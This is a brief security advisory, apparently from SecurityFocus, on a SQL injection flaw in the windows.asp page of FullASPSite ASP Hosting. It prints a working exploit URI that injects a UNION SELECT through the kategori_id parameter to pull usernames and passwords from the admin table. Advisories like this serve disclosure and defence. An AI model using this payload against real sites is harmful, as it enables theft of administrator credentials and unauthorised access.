FullASPSite ASP Hosting Windows.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following exploit URI is available:

http://www.example.com/windows.asp?kategori_id=-1%20union+all+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin


 

Privacy Statement
Copyright 2010, SecurityFocus